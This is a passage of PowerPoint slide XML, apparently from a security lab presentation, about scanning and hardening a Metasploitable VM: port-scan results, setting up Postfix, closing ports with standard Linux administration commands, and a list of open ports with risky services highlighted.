          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nmap found 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nessus found 30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Greater than 8180</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6082000" y="205972"/>
            <a:ext cx="2770399" cy="2761600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="61542" l="0" r="26766" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072700" y="3187250"/>
            <a:ext cx="6696600" cy="1738600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 389"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="121578"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Setting up a mail server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="874825"/>
            <a:ext cx="8229600" cy="4268399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Postfix mail server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>apt-get install postfix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploitable VM runs Ubuntu 8.04 Hardy Heron LTS from 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Support ended May 12, 2011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>APT repos are no longer up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source code must be manually downloaded from the CLI, unzipped, compiled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Or, upgrade the distro with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>do-release-upgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5" name="Shape 395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>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Port scans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 397"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port scans now show port 25 (SMTP) is open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Something must be listening for mail-related traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Postfix is already installed; has a service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2820" l="3410" r="53582" t="82486"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3039650"/>
            <a:ext cx="8320723" cy="1521925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="Shape 402"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>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Closing ports + securing Ubuntu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="917575"/>
            <a:ext cx="8229600" cy="4080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Ports can’t be arbitrarily closed by user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Sockets can only be cleanly closed by owning application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Number of ways to make this happen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Send SIGTERM or SIGKILL if necessary using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>kill -9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Find the owner with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>netstat -anp | grep “[port]”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Control the owner’s service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ls /etc/init.d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Start and stop with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(sudo)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/etc/init.d/[name] [stop][start][restart]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Remove the offending application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>apt-get remove --purge [name]; apt-get clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> to block traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>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8" name="Shape 408"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 40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Again: open ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1209500"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>22 SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>25 SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>53 domain (DNS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> (web app)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rpcbind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>139 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netbios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Win File + Printer Sharing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3312900" y="1209500"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>445 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>512/3/4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>1099 Java RMI Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>1524 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingres DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>2049 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nfs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>2121 FTP proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>3306 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
